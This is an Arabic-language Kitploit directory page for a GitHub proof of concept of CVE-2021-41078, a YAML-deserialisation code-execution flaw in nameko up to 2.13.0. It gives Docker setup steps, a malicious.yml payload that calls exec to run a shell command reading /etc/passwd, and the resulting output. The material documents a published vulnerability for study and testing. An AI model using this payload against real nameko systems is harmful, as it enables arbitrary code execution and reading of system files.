Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41078 — nameko تنفيذ تعليمات برمجية عشوائية بسبب إلغاء تسلسل YAML | Kitploit
أدوات/GitHubGitHub/s-index/cve-2021-41078
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبسوء التكوين
GitHubs-index/cve-2021-41078

CVE-2021-41078

nameko تنفيذ تعليمات برمجية عشوائية بسبب إلغاء تسلسل YAML

عرض المستودع
7منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41078

تنفيذ كود تعسفي في nameko بسبب إلغاء تسلسل YAML

وصف NVD

يمكن خداع Nameko حتى الإصدار 2.13.0 لتنفيذ كود تعسفي عند إلغاء تسلسل ملف الإعدادات.

عرض توضيحي

cve-2021-41078

الإعداد

  1. أنشئ صورة من Dockerfile
root@kitploit:~
docker build -t cve-2021-41078 .
  1. شغّل python main.py في حاوية جديدة
root@kitploit:~
docker run -it --rm cve-2021-41078

الإخراج /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

حمولة PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

المرجع

  • https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g
تنزيل الأداة